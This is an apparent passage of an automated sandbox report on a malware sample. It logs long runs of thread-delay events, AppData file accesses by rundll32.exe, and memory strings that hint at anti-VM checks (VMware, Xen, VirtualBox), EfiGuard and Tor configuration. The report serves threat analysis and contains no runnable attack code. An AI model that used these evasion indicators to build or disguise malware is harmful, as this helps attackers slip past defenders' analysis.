                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 98031Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 97922Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 97811Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 97689Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 97547Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 97429Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 97250Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 96969Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 96820Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 96641Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 96515Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 95996Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 95842Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 95719Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 95593Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 95345Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 95094Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 94969Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 94811Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 94702Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 94547Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 94281Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 94093Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 93953Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 93750Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 93547Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 93396Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 92906Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 92740Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 92594Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 92453Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 92259Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeThread delayed: delay time: 92148Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599859
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599719
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599561
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599430
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599299
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599174
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 599031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598893
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598766
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598620
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598483
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598351
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598222
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 300000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 598084
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597953
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597813
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597637
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597472
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597346
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597203
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 597037
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596914
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596800
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596672
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596547
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596406
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596279
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 596135
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595922
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595776
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595625
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595495
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595375
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 595250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594920
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594786
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594406
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 594217
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593922
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 593469
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 592990
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 592563
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 592250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 591656
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 591203
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 590125
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 588906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 588453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 587906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 585188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 584641
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 584063
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 583359
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 582781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 582250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 581563
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 581094
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 580531
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 580031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 579375
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 578844
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 578359
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 577797
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 577109
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 576531
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 576281
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 575797
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 575406
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 575015
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 574734
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 574484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 574188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 573904
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 573648
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 573358
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 572941
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 572634
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 572276
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 571901
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 571540
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 571252
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 570621
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 569433
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 567786
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 567430
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 567022
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 566808
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 566377
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 566059
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 565580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 565013
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 564318
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 563781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 563375
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 562136
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 561159
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 560511
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 559868
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 559543
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 559278
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 558825
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 558612
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 558271
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 557957
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 557511
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 557172
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 556925
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 556480
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 556177
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 555870
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 555625
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 555435
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 555128
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 554852
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 554123
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 553836
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 553532
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 550943
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 550615
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 550254
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 549815
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 549593
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 549415
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 549082
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 548720
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 548348
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 548105
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 547885
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 547686
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 547497
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 547279
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 547168
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 547042
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 546933
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 546744
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 546608
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 546423
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 546268
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 546085
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 545920
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 545739
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 545568
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 545414
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 545280
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 545163
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 545020
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 544883
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 544717
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 544513
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 544311
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 544190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 544059
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 543855
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 543693
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 543545
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 543413
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 543228
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 543092
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 542952
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 542810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 542668
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 542559
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 542427
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 542307
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 542044
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 541732
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 541597
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 541477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 541334
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 541220
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 541092
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 540945
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 540829
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 540715
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 540601
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 540476
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 540348
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 540224
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 540104
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 539942
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 539804
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 539683
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 539562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 539445
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 539336
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 539229
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 539114
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 538990
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 538848
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 538726
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 538608
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 538481
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 538355
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 538241
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 538119
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 537996
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 537859
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 537752
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 537638
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 537507
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 537390
                  Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\logo.png
                  Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user
                  Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                  Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming
                  Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData
                  Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\qrcode.png
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: sbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--P
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad allocCountbad record MACbad restart PCbad span statebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removederror responsefile too largefinalizer waitgcstoptheworldget uptime: %wgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedmemprofileratemultipartfilesneed more datanil elem type!no module datano such deviceopen event: %wparse cert: %wprotocol errorread certs: %wread_frame_eofreflect.Value.remove app: %wruntime: full=runtime: want=s.allocCount= semaRoot queueserver.versionstack overflowstart task: %wstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriodtoo many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
